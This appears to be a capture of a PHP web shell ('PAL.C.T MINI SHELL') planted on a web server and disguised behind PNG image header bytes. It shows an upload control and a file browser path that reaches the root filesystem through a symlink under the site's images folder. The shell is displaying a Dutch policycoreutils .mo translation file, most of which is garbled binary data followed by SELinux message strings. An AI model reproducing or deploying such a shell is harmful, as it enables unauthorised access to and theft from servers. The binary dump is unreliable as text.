php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/nl/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/nl/LC_MESSAGES/policycoreutils.mo

,<*h8i8}8888?8;9&O99v99997:?:C:L:`:s::::::::::;+;<;U;/^;;;;;G;E<$M<)r<M<5<) =lJ=)==2=L2>K>>">
?(?!G?'i?D?B?@A@@4A&7A,^A%A2AAKB5MBTB<BLC(bC,CPC2	D.<DJkD%D(D4E:E]VECE(E!F$FF%G-=GLkGxG1H(=HfHH2HHHH2H#I1<I2nII I"IIJAL
L
MMP&MwMM!MM"MN$NCN-`N%N(N1N*O2:O(mOO%O$OO P>P[P"{P$P!PP%Q'Q GQ hQQQ$QQ%R'R$CRhR$R'RRRS+S@SXSuS"SSS S T'T @TaTzT$TT%TTU3UKU#kUUUUU5V7VVV!uV(V!V"V!W&'WNW$hW/W/W4W2"XUX?oX$X)X)X.(Y,WY)Y)Y.Y,Z)4Z)^Z.Z,Z$Z!	[+[)G[q[v[
[[	[	[[[[\\
\-)\(W\)\2\2\-]*>]*i]%]%]*].^,:^/g^$^/^+^-_+F_+r_'_$_,_-`0F`.w`+`0`4a+8a(da)a+a,a+b#<b%`b#b)b,b+c+-c+Yc-c+c-c-
d.;d(jd-d/d.d$ e)Ee)oe.e-e*e*!f/Lf-|f*f.f2g+7g*cg.g*g0g+h-Eh-sh+h-h,h+(i,Ti)i*i)i&j+'j,Sj*j,j,j+k-1k*_k*k*k*k)l*5l%`l/l-l)l&m/5m-em/m&m0m#n-?n-mn*n)n%n+o-Bo+po$o(o*o*p$@p0ep-p*p#p+q/?q3oq.q&q4q+.r.Zr*r+r+r+s,8s+es/s+s)s-t*Et*pt-t/t)t,#u+Pu/|u0u*u)v.2v-av+v,v.v-w)Ew*ow)w)w,w,xHxQx1px:x9xNyfyxyWy	y2yJz<ezz zz"z+{&K{r{+{#{{!{%|<|X|!u| | |F|
 }+}
?}M}k}	~}}
}}	};}"~%~,~0~6~
Q~
\~j~v~4~~~ ~6Jenw	

<#X	|	

Āր	
+G%SGýӁׁہ'@Ym	

ʂς27C8T8ƃ̓փ!9Wv&Ƅ"(HMbЅ
!<Ibo:7ˆ"@DJcp,FJ&:'<GH($ˊ05O6̋ҋqY`~|,*׍'.*3Y42Ž4E*p'*)R|",	'<Xq}*ܑ'"'Jr]
	rUv̓	.$*S~L%C4_<ѕ0!-_1,4֖#,/(\("ė9PlǘϘטߘ"*#G7k$ڙ#"Fӛ&Z;Y/> !_?72I[n	˞! &&Bi;|՟ܟb`Y$,ߠZ9g:ܡ9d%EĢc
bnѣ),!G(i1OĤNcU#U:y-1*=?"}b@rDAc6]?jԩ;?E{f2(5[I2۫fVu6̬0ڭ4*@2kc
.ȯA1
Q_5c&J;G(f'N7G\Qd'޵*$+Dp$!<ֶ/2C?v4@3,!`&+!ո$!;$])#!й*"!@)b,ɺ!- F'g'.ջ#(!Gi 'Ҽ!'3 [|(ؽ+ #,Dq$Ǿ)5 S#t?%ؿ$,#0P')*,!+,M5z8:9$^D~+.13P2/243O4798*$c#$(	"	6	@Jd'|
/*+.6Z4/,,#'P'x,0.1-&_1-/--D)r&./2"0U-25-*K+v-.-%-'S%{+.--*-X/-//0D*u/10(3+\+0/,,B1o/,04/-d,0,2-P/~/-/-<-j.+,+ (L-u.,...-]/,,,,B+o,'1/"+R(~1/1	(;2d%//,+J'v-/-&**Q,|,&2/0,`%-150I(z6-0,9-f--.-1M-+/,	,6/c3+.-"-P1~,+0	/:,j.0/+'-S++..7@4_D>\u
a
DfJD%/+L.x92 756m,.34O!l J	$?2TN,Cpw{"
C!3U gB7G[p
}
O-
'	2<@EU
dr 
&-)EW
$>Xk}	B >K<\;	
"0/!`!(!1:K(%CVixAK.)z!2N12Jd )?X:!DBaC"-3-a,3<=-;k=G-FV0
8>+w47.0?p#

%,2R -:`$
~]=$/32fL,	'6=^= /+8GjL64#;2_76	-!	*O	'z	!	!	)	'
'8
!`









"

&
61hlpu'{P
),Nk	je~a!l@1CIc&jh'2,;<B(0F]4po%=vs(9/l{y%bC1iCX:$%|ffTHK@7IQ
GH
)s)W&3m.DI]T"vAh5 66F
a
k80uu|RY'*$4zOe !mG8beZq^wS!|YZ
sJzKi5kO(-
Gw*.VUE>;JczV-}=E\PY-+{P1$p<dX,Rg2t[rqU`g<@j^QwS_J+}yFxqyD	B ?xr0i~n_MaK.Tl~v>Sn:UfA+rNn3B_[9)`"dERW]LO5g8?pt\*`bhH>c3N[xu?}6#DM2ZQPo#M#Ad'4o/=/^7\	W,":LtVX;m&L{79%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: policycoreutils.HEAD.nl
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-07-14 14:01+0200
Last-Translator: Geert Warrink <geert.warrink@onsnet.nu>
Language-Team: Fedora
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 
Language: nl
Plural-Forms: nplurals=2; plural=(n != 1);
X-Generator: Virtaal 0.6.1
%s veranderde labels.
%s is al in %s%s is geen geldige context
%s is niet in %s%s moet een map zijn%s!  Kon huidige context niet verkrijgen voor %s, opnieuw labelen van tty gaat niet door.
%s!  Kon geen nieuwe context verkrijgen voor %s, opnieuw labelen van tty gaat niet door.
%s!  Kon geen nieuwe context instellen voor %s
%s:  Kan tactiek niet laden en afdwingende mode verzocht:  %s
%s:  Kan tactiek:  %s niet laden
%s:  Tactiek is al geladen en initiële inladen wordt verzocht
******************** BELANGRIJK **********************
...600-1024<b>Toepassingen</b><b>Inlog gebruikers</b><b>Root gebruikers</b><b>Selecteer:</b><b>TCP poorten</b><b>UDP poorten</b>Toevoegen%s toevoegenVoeg Booleans toe dialoogVoeg bestand context toeNetwerk poort toevoegenVoeg SELinux inlog afbeelding toeVoeg SELinux netwerk poorten toeSELinux gebruiker toevoegenVoeg SELinux gebruikers afbeelding toeVoeg gebruiker toeAddr %s gedefinieerd in tactiek, kan niet worden verwijderdAddr %s is niet gedefinieerdBeheerBeheer gebruiker rolAlleSta SELinux webadmin gebruiker toe om persoonlijke mappen van gebruikers zonder rechten te beherenSta SELinux webadmin gebruiker toe om persoonlijke mappen van gebruikers zonder rechten te lezenSta Samba toe om nfs mappen te delenSta Spam Assassin daemon netwerk toegang toeSta toe dat X-Windows server een geheugen gebied zowel uitvoerbaar als beschrijfbaar maaktSta alle daemons toe om niet-toegewezen ttys te gebruikenSta alle daemons toe om core bestanden te schrijven naar /Sta cdrecord toe verscheidene inhoud te lezen. nfs, samba, verwijderbare apparaten, gebruikers temp en niet-vertrouwde inhoud bestandenSta cliënten toe om te schrijven naar X gedeeld geheugenSta daemons toe om met NIS te draaienSta evolution en thunderbird toe om bestanden van gebruikers te lezenSta gadmin SELinux gebruiker account toe om bestanden uit te voeren in the persoonlijke map of /tmpSta guest SELinux gebruiker account toe om bestanden uit te voeren in the persoonlijke map of /tmpSta uitvoerbare java stack toeSta mount toe om elke map aan te koppelenSta mount toe om elk bestand aan te koppelenSta mplayer uitvoerbare stack toeSta gewone gebruikers ping uit te voerenSta toe dat pppd draait voor een gewone gebruikerSta programma's met rechten zoals hotplug en insmod toe om onbeperkt te draaienSta toe dat programma's bestanden lezen in niet-standaard locaties (default_t)Sta rc scripts toe om onbeperkt te draaien, inclusief alle daemons gestart door een rc script en die een domein overgang niet expliciet gedefinieerd hebbenSta reguliere gebruikers directe toegang tot de muis toe (sta alleen de X server toe)Sta rpm toe om onbeperkt te draaienSta toe dat de sasl authenticatie server /etc/shadow leestSta spamd toegang toe tot persoonlijke mappenSta squid daemon toe te verbinden met het netwerkSta ssh inloggen toe met sysadm_r:sysadm_tSta ssh toe van inetd te draaien in plaats van als een daemonSta ssh toe ssh-keysign te draaienSta staff SELinux gebruiker account toe om bestanden uit te voeren in the persoonlijke map of /tmpSta staff Web browsers toe te schrijven naar persoonlijke mappenSta staff_r gebruikers toe om de persoonlijke map van sysadm te doorzoeken en bestanden te lezen (zoals ~/.bashrc)Sta de stunnel daemon toe alleen-staand te draaien, buiten xinetdSta sysadm SELinux gebruiker account toe om bestanden uit te voeren in the persoonlijke map of /tmpSta sysadm_t toe om daemons rechtstreeks op te startenSta de mozilla browser toe om bestanden van gebruikers te lezenSta niet-beperkte SELinux gebruiker account toe om bestanden uit te voeren in the persoonlijke map of /tmpSta niet-beperkt toe om te dyntrans naar unconfined_execmemSta niet gelabelde pakketten toe zich te verplaatsen over het netwerkSta gebruiker SELinux gebruiker account toe om bestanden uit te voeren in the persoonlijke map of /tmpSta gebruiker toe om te verbinden met mysql socketSta gebruiker toe om te verbinden met postgres socketSta gebruikers lezen/schrijven toe van noextattrfile (FAT, CDROM, FLOPPY)Sta gebruiker toe stat tty bestanden uit te voerenSta user_r toe om sysadm_r te bereiken met su, sudo, of userhelper. Anders kan alleen staff_r dit doenSta gebruikers toe de netwerk interfaces te controleren (heeft ook USERCTL=true nodig)Sta gebruikers toe om het mount commando uit te voerenSta gebruikers toe TCP server te draaien (verbinden naar poorten en verbindingen accepteren van hetzelfde domein en gebruiker erbuiten), dit uitzetten forceert FTP passieve mode en kan andere protocollen veranderenSta gebruikers toe het dmesg commando te draaienSta gebruikers lezen/schrijven toe van usb apparatenSta xdm inloggen toe als sysadm_r:sysadm_tSta xen lezen/schrijven toe voor fysieke apparatenSta xguest SELinux gebruiker account toe om bestanden uit te voeren in the persoonlijke map of /tmpSta xinetd toe om onbeperkt te draaien, inclusief alle services die het start en die een domein overgang niet expliciet gedefinieerd hebbenToepassingWeet je zeker dat je %s '%s' wilt verwijderen?Verkeerd formaat %s: Record %sBooleanBoolean %s is gedefinieerd in tactiek, kan niet worden verwijderdBoolean %s is niet gedefinieerdBooleaan naamCVSKan +/- niet combineren met andere typen categorieënKan geen meerdere gevoeligheden hebbenKan gevoeligheid niveaus door gebruik te maken van '+' op %s niet wijzigenKan jouw ingang in het schaduw passwd bestand niet vinden.
Kan tactiek opslag niet lezen.Verander de proces mode naar afdwingend.Verander de proces mode naar toelatend.Het tactiek type veranderen zal een opnieuw labelen van het gehele systeem veroorzaken bij de volgende systeem opstart. Opnieuw labelen duurt lang afhankelijk van de grootte van het bestandssysteem. Wil je verder gaan?Veranderen van SELinux naar uitgezet vereist een systeem opstart.  Dit wordt niet aanbevolen.  Als je later besluit om SELinux weer aan te zetten, zal het systeem opnieuw labelen nodig hebben.  Als je alleen wilt zien of SELinux een probleem op jouw systeem veroorzaakt, kun je naar de toelatende mode gaan die alleen fouten zal bewaren en de SELinux tactiek niet afdwingen.  Toelatende mode vereist geen systeem opstart    Wil je verder gaan?Veranderen naar SELinux aangezet zal opnieuw labelen van het gehele bestandssysteem veroorzaken bij de volgende systeem opstart. Opnieuw labelen kost veel tijd afhankelijk van de grootte van het bestandssysteem.  Wil je verder gaan?CompatibiliteitSELinux configurerenContextCopyright (c) 2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Kan SELinux gebruiker %s niet toevoegenKan addr %s niet toevoegenKan bestand context niet toevoegen voor %sKan interface %s niet toevoegenKan inlog afbeelding niet toevoegen voor %sKan poort %s/%s niet toevoegenKan prefix %s niet toevoegen voor %sKan rol %s niet toevoegen voor %sKan niet controleren of SELinux gebruiker %s is gedefinieerdKan niet controleren of addr %s is gedefinieerdKan niet controleren of Boolean %s gedefinieerd isKan niet controleren of bestand context voor %s is gedefinieerdKan niet controleren of interface %s gedefinieerd isKan niet controleren of inlog afbeelding voor %s is gedefinieerdKan niet controleren of poort %s/%s gedefinieerd isKan beschrijvingen niet sluiten.
